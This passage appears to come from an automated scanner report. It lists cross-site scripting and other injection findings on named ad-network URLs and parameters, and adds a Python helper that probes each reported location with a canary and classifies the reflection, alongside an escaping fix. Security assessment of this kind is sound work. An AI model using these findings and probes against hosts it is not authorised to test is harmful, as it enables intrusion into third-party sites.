3.88. http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 15]

3.89. http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 16]

3.90. http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 17]

3.91. http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 18]

3.92. http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 19]

3.93. http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 3]

3.94. http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 4]

3.95. http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 5]

3.96. http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 6]

3.97. http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 7]

3.98. http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 8]

3.99. http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 9]

3.100. http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.10;abr parameter]

3.101. http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 [name of an arbitrarily supplied request parameter]

3.102. http://a.tribalfusion.com/h.click/afmM7iPPQoUdMVUrb03F2nVaYqWEB7STJZcRcbJRr6qRWUbWGbQ4rTuoWqq0qmv4WQBQVvZd2AQHotisUtF70bnkYFYfXaapPUnZbTrJXTtQ3nbQnQUfmYqYy5TJd4TYXnaJC1r38TW7TomUJmcQnmHfoogm1wx/ [name of an arbitrarily supplied request parameter]

3.103. http://a.tribalfusion.com/h.click/afmM7iPPQoUdMVUrb03F2nVaYqWEB7STJZcRcbJRr6qRWUbWGbQ4rTuoWqq0qmv4WQBQVvZd2AQHotisUtF70bnkYFYfXaapPUnZbTrJXTtQ3nbQnQUfmYqYy5TJd4TYXnaJC1r38TW7TomUJmcQnmHfoogm1wx/http:/www.reachout.com/ [REST URL parameter 3]

3.104. http://a.tribalfusion.com/h.click/afmM7iPPQoUdMVUrb03F2nVaYqWEB7STJZcRcbJRr6qRWUbWGbQ4rTuoWqq0qmv4WQBQVvZd2AQHotisUtF70bnkYFYfXaapPUnZbTrJXTtQ3nbQnQUfmYqYy5TJd4TYXnaJC1r38TW7TomUJmcQnmHfoogm1wx/http:/www.reachout.com/ [REST URL parameter 4]

3.105. http://a.tribalfusion.com/h.click/afmM7iPPQoUdMVUrb03F2nVaYqWEB7STJZcRcbJRr6qRWUbWGbQ4rTuoWqq0qmv4WQBQVvZd2AQHotisUtF70bnkYFYfXaapPUnZbTrJXTtQ3nbQnQUfmYqYy5TJd4TYXnaJC1r38TW7TomUJmcQnmHfoogm1wx/http:/www.reachout.com/ [name of an arbitrarily supplied request parameter]

3.106. http://a.tribalfusion.com/h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/ [name of an arbitrarily supplied request parameter]

3.107. http://a.tribalfusion.com/h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/ [ord parameter]

3.108. http://a.tribalfusion.com/h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r [REST URL parameter 3]

3.109. http://a.tribalfusion.com/h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r [REST URL parameter 4]

3.110. http://a.tribalfusion.com/h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r [REST URL parameter 5]

3.111. http://a.tribalfusion.com/h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r [a parameter]

3.112. http://a.tribalfusion.com/h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r [dcc parameter]

3.113. http://a.tribalfusion.com/h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r [dcp parameter]

3.114. http://a.tribalfusion.com/h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r [name of an arbitrarily supplied request parameter]

3.115. http://a.tribalfusion.com/h.click/aimNQCWdQ3UrnX3rAqWTjmWTQ8QqrLQVYJQFZaoPHv7WGQV4U6tnWZaoXEmv4dnZbPcJH4mJZbotTnUdBbYrY81UBl1TqoPbYETFBYTtYYoFfxQrMr1E3s4EUk5aM2ma7IYrJgUtFRnm3LpGfnpWrF5qnf2WAr3AvMnW8PL9/http:/pixel.quantserve.com/r [vehicle parameter]

3.116. http://a.tribalfusion.com/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/ [name of an arbitrarily supplied request parameter]

3.117. http://a.tribalfusion.com/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/ [ord parameter]

3.118. http://a.tribalfusion.com/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r [REST URL parameter 3]

3.119. http://a.tribalfusion.com/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r [REST URL parameter 4]

3.120. http://a.tribalfusion.com/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r [REST URL parameter 5]

3.121. http://a.tribalfusion.com/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r [a parameter]

3.122. http://a.tribalfusion.com/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r [dcc parameter]

3.123. http://a.tribalfusion.com/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r [dcp parameter]

3.124. http://a.tribalfusion.com/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r [name of an arbitrarily supplied request parameter]

3.125. http://a.tribalfusion.com/h.click/atmNYDUVn54FTpmHuqXTew3tnCSVBC2mBZapWitVWJcXr3dYFYf1TEOSFUCUUB0TdMXmFBxPFjqXqZbm5TJh5q7XnTBIXFU7UdFXmPfJmVjqmH3L3qZbh3dIN5PJZbmbvZd0GvQ1VYX0VFynEv23bMWWFMBWAUXPqbQ3UQGvC5voK/http:/pixel.quantserve.com/r [vehicle parameter]

3.126. http://ad.afy11.net/ad [c parameter]

3.127. http://au.track.decideinteractive.com/n/13465/13553/www.247realmedia.com/5143c0dd002503000000000600000000036393fa0000000000000000000000000000000100/i/c [REST URL parameter 4]

3.128. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp [eyeblaster cookie]

3.129. http://bs.serving-sys.com/BurstingPipe/adServer.bs [bwVal parameter]

3.130. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]

3.131. http://bs.serving-sys.com/BurstingPipe/adServer.bs [flv parameter]

3.132. http://bs.serving-sys.com/BurstingPipe/adServer.bs [res parameter]

3.133. http://bs.serving-sys.com/BurstingPipe/adServer.bs [wmpv parameter]

3.134. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [$ parameter]

3.135. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [$ parameter]

3.136. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter]

3.137. http://media.fastclick.net/w/click.here [c parameter]

3.138. http://media.fastclick.net/w/click.here [cid parameter]

3.139. http://media.fastclick.net/w/click.here [i parameter]

3.140. http://na.link.decdna.net/n/49881/49889/www.247realmedia.com/1ykg1it [REST URL parameter 2]

3.141. http://na.link.decdna.net/n/49881/49889/www.247realmedia.com/1ykg1it [REST URL parameter 4]

3.142. http://na.link.decdna.net/n/49881/49889/www.247realmedia.com/1ykg1it [REST URL parameter 5]

3.143. http://xads.zedo.com/ads2/c [a parameter]

3.144. http://xads.zedo.com/ads2/c [name of an arbitrarily supplied request parameter]

4. Cross-site scripting (reflected)

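How to read the injection-point notation in these entries, with an added verification helper that is not part of the crawler report: each line names a URL and, in brackets, where the scanner placed its payload. "REST URL parameter N" is the Nth path segment after the host (for /adj/bzo.847.CD39C435/ATF, parameter 3 is ATF), "sz parameter" is a query value, "name of an arbitrarily supplied request parameter" means the parameter name itself came back in the response, and "eyeblaster cookie" or "User-Agent HTTP header" point at request headers. Findings on ad-tag endpoints such as adj/ and cmadj/ deserve a manual check because those endpoints typically answer with JavaScript that document.write()s the tag, so an unencoded reflection lands in script context rather than in HTML. The code below parses a finding line, rebuilds the request with a canary at the reported location, and classifies the reflection as absent, encoded or unencoded. The segment numbering and mock_ad_tag are assumptions: the mock stands in for a real ad server, reflects only the zone path and sz, and is not collective-media.net's code; pass a real HTTP client as `send` to test a host you are authorised to probe.

```python
"""Triage helper for the '[injection point]' notation used in this report.

Added example, not part of the crawler output. It parses one finding line, builds a
probe that places a canary at the reported location, and classifies how the canary
comes back. mock_ad_tag is a constructed stand-in for an /adj/ ad-tag endpoint and
is an assumption, not the vendor's code."""
import re
from urllib.parse import parse_qsl, quote, unquote, urlsplit, urlunsplit

FINDING_RE = re.compile(r"^(\d+\.\d+)\.\s+(\S+)\s+\[(.+)\]$")
METACHARS = "\"'<>"  # these must come back verbatim for a reflection to matter

def parse_finding(line):
    """'4.14. http://host/path [sz parameter]' -> ('4.14', url, 'sz parameter')."""
    m = FINDING_RE.match(line.strip())
    if not m:
        raise ValueError(f"not a finding line: {line!r}")
    return m.group(1), m.group(2), m.group(3)

def build_probe(url, location, canary):
    """Return (probe_url, extra_headers) with `canary` placed at `location`."""
    parts = urlsplit(url)
    m = re.fullmatch(r"REST URL parameter (\d+)", location)
    if m:
        # Assumption: segments are numbered from 1 after the host, so in
        # /adj/bzo.847.CD39C435/ATF parameter 1 is 'adj' and parameter 3 is 'ATF'.
        segs = parts.path.split("/")  # segs[0] is '' because of the leading slash
        n = int(m.group(1))
        if not 1 <= n < len(segs):
            raise ValueError(f"{parts.path} has no segment {n}")
        segs[n] = quote(canary, safe="")
        return urlunsplit(parts._replace(path="/".join(segs))), {}
    if location == "name of an arbitrarily supplied request parameter":
        extra = quote(canary, safe="") + "=1"
        query = f"{parts.query}&{extra}" if parts.query else extra
        return urlunsplit(parts._replace(query=query)), {}
    m = re.fullmatch(r"(.+) parameter", location)
    if m:
        name = m.group(1)
        pairs = [(k, canary if k == name else v)
                 for k, v in parse_qsl(parts.query, keep_blank_values=True)]
        if name not in {k for k, _ in pairs}:
            pairs.append((name, canary))
        # Names stay raw on purpose: '$' or ';ord' must not be percent-encoded.
        query = "&".join(f"{k}={quote(v, safe='')}" for k, v in pairs)
        return urlunsplit(parts._replace(query=query)), {}
    m = re.fullmatch(r"(.+) cookie", location)
    if m:
        return url, {"Cookie": f"{m.group(1)}={canary}"}
    m = re.fullmatch(r"(.+) HTTP header", location)
    if m:
        return url, {m.group(1): canary}
    raise ValueError(f"unrecognised injection point: {location!r}")

def js_escape(s):
    """Hardened output encoding for a value written into a JS string literal that
    is then document.write()n as HTML: every non-alphanumeric ASCII character
    becomes \\uXXXX, which is inert in both the script and the HTML context."""
    return "".join(c if c.isascii() and c.isalnum() else f"\\u{ord(c):04x}" for c in s)

def mock_ad_tag(url, headers, escape=False):
    """Constructed /adj/ endpoint: returns JavaScript that writes a click tag built
    from the zone path and the sz parameter, verbatim unless escape=True."""
    parts = urlsplit(url)
    zone = "/".join(unquote(s) for s in parts.path.split("/")[2:])
    sz = dict(parse_qsl(parts.query, keep_blank_values=True)).get("sz", "")
    if escape:
        zone, sz = js_escape(zone), js_escape(sz)
    body = ("document.write('<a href=\"http://a.collective-media.net/click/"
            f"{zone}?sz={sz}\"><img src=\"/i/{sz}.gif\"></a>');")
    return "application/x-javascript", body

def classify(body, token):
    """'not reflected', 'reflected encoded' or 'reflected unencoded', judged by
    whether METACHARS survived verbatim directly after any copy of the token."""
    ends = [m.end() for m in re.finditer(re.escape(token), body)]
    if not ends:
        return "not reflected"
    if any(body[e:e + len(METACHARS)] == METACHARS for e in ends):
        return "reflected unencoded"
    return "reflected encoded"

def verify(line, send, token="cmq7"):
    """Probe one finding through send(url, headers) -> (content_type, body)."""
    number, url, location = parse_finding(line)
    probe, headers = build_probe(url, location, token + METACHARS)
    ctype, body = send(probe, headers)
    verdict = classify(body, token)
    if verdict == "reflected unencoded" and "javascript" in ctype:
        verdict += " (script context)"  # lands inside the ad tag's JavaScript
    return number, probe, verdict

if __name__ == "__main__":  # constructed sample: three injection points on one ad-tag URL
    for loc in ("REST URL parameter 3", "sz parameter",
                "name of an arbitrarily supplied request parameter"):
        line = f"4.0. http://a.collective-media.net/adj/bzo.847.CD39C435/ATF [{loc}]"
        print(loc, "->", verify(line, mock_ad_tag)[2], "|",
              verify(line, lambda u, h: mock_ad_tag(u, h, True))[2])
```

js_escape shows the fix a vendor would apply: with every non-alphanumeric character encoded, the same probe degrades to "reflected encoded". The classifier only checks that quotes and angle brackets survive; it does not prove a working payload, which depends on exactly where in the tag the value lands, and a finding whose probe reports "not reflected" should be re-run with the scanner's original request before it is closed as a false positive.
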
4.1. http://a.collective-media.net/ad/cm.quadbostonherald/ [REST URL parameter 1]

4.2. http://a.collective-media.net/ad/q1.bosherald/be_ent [REST URL parameter 1]

4.3. http://a.collective-media.net/ad/q1.bosherald/be_ent [REST URL parameter 1]

4.4. http://a.collective-media.net/ad/q1.bosherald/be_ent_fr [REST URL parameter 1]

4.5. http://a.collective-media.net/ad/q1.bosherald/be_ent_fr [REST URL parameter 1]

4.6. http://a.collective-media.net/ad/q1.bosherald/ent [REST URL parameter 1]

4.7. http://a.collective-media.net/ad/q1.bosherald/ent [REST URL parameter 1]

4.8. http://a.collective-media.net/ad/q1.bosherald/ent_fr [REST URL parameter 1]

4.9. http://a.collective-media.net/ad/q1.bosherald/ent_fr [REST URL parameter 1]

4.10. http://a.collective-media.net/ad/uol.collective/ColeHaan_MM_Openness_CMN_13109 [REST URL parameter 1]

4.11. http://a.collective-media.net/adj/bzo.847.CD39C435/ATF [REST URL parameter 2]

4.12. http://a.collective-media.net/adj/bzo.847.CD39C435/ATF [REST URL parameter 3]

4.13. http://a.collective-media.net/adj/bzo.847.CD39C435/ATF [name of an arbitrarily supplied request parameter]

4.14. http://a.collective-media.net/adj/bzo.847.CD39C435/ATF [sz parameter]

4.15. http://a.collective-media.net/adj/cm.quadbostonherald/ [REST URL parameter 2]

4.16. http://a.collective-media.net/adj/cm.quadbostonherald/ [name of an arbitrarily supplied request parameter]

4.17. http://a.collective-media.net/adj/cm.quadbostonherald/ [sz parameter]

4.18. http://a.collective-media.net/adj/cm.rev_bostonherald/ [REST URL parameter 2]

4.19. http://a.collective-media.net/adj/cm.rev_bostonherald/ [name of an arbitrarily supplied request parameter]

4.20. http://a.collective-media.net/adj/cm.rev_bostonherald/ [sz parameter]

4.21. http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience [REST URL parameter 2]

4.22. http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience [REST URL parameter 3]

4.23. http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience [name of an arbitrarily supplied request parameter]

4.24. http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience [sz parameter]

4.25. http://a.collective-media.net/adj/q1.bosherald/be_ent [REST URL parameter 2]

4.26. http://a.collective-media.net/adj/q1.bosherald/be_ent [REST URL parameter 3]

4.27. http://a.collective-media.net/adj/q1.bosherald/be_ent [name of an arbitrarily supplied request parameter]

4.28. http://a.collective-media.net/adj/q1.bosherald/be_ent [sz parameter]

4.29. http://a.collective-media.net/adj/q1.bosherald/be_ent_fr [REST URL parameter 2]

4.30. http://a.collective-media.net/adj/q1.bosherald/be_ent_fr [REST URL parameter 3]

4.31. http://a.collective-media.net/adj/q1.bosherald/be_ent_fr [name of an arbitrarily supplied request parameter]

4.32. http://a.collective-media.net/adj/q1.bosherald/be_ent_fr [sz parameter]

4.33. http://a.collective-media.net/adj/q1.bosherald/ent [REST URL parameter 2]

4.34. http://a.collective-media.net/adj/q1.bosherald/ent [REST URL parameter 3]

4.35. http://a.collective-media.net/adj/q1.bosherald/ent [name of an arbitrarily supplied request parameter]

4.36. http://a.collective-media.net/adj/q1.bosherald/ent [sz parameter]

4.37. http://a.collective-media.net/adj/q1.bosherald/ent_fr [REST URL parameter 2]

4.38. http://a.collective-media.net/adj/q1.bosherald/ent_fr [REST URL parameter 3]

4.39. http://a.collective-media.net/adj/q1.bosherald/ent_fr [name of an arbitrarily supplied request parameter]

4.40. http://a.collective-media.net/adj/q1.bosherald/ent_fr [sz parameter]

4.41. http://a.collective-media.net/adj/uol.collective/ColeHaan_MM_Openness_CMN_13109 [REST URL parameter 2]

4.42. http://a.collective-media.net/adj/uol.collective/ColeHaan_MM_Openness_CMN_13109 [REST URL parameter 3]

4.43. http://a.collective-media.net/adj/uol.collective/ColeHaan_MM_Openness_CMN_13109 [dcove parameter]

4.44. http://a.collective-media.net/adj/uol.collective/ColeHaan_MM_Openness_CMN_13109 [name of an arbitrarily supplied request parameter]

4.45. http://a.collective-media.net/cmadj/bzo.847.CD39C435/ATF [REST URL parameter 1]

